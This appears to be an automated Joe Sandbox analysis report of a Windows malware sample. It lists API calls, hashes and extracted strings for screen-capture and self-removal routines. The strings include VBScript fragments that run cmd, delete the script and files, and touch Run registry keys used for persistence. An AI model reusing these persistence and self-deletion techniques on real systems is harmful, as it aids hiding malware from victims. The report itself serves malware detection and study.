                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction Fuzzy Hash:
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: RGw@
                                          • API String ID: 0-316194375
                                          • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                          • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                          • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                          • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                          • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                          • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                          • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                          • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                          • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                          • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                          • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                          • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                          • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                          • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                          • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                          • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                          • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                          • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                          • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                          • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                          • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                          • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                          • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                          • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                          • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                          • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                          • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                          • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                          • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                          • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                          • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                          • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                          • GetIconInfo.USER32(?,?), ref: 00418FF8
                                          • DeleteObject.GDI32(?), ref: 00419027
                                          • DeleteObject.GDI32(?), ref: 00419034
                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                          • DeleteDC.GDI32(?), ref: 004191B7
                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                          • DeleteDC.GDI32(?), ref: 00419293
                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                          • String ID: DISPLAY
                                          • API String ID: 4256916514-865373369
                                          • Opcode ID: c1f87ec315365c2bd807a29870f8556d4033a7f08f871e569c42423f77b65dc4
                                          • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                          • Opcode Fuzzy Hash: c1f87ec315365c2bd807a29870f8556d4033a7f08f871e569c42423f77b65dc4
                                          • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("$xdF$xpF
                                          • API String ID: 1861856835-1567776996
                                          • Opcode ID: 378485639873f91e3566d37bd4c9dc270e24a7b07407a649f66661562ec7a51b
                                          • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                          • Opcode Fuzzy Hash: 378485639873f91e3566d37bd4c9dc270e24a7b07407a649f66661562ec7a51b
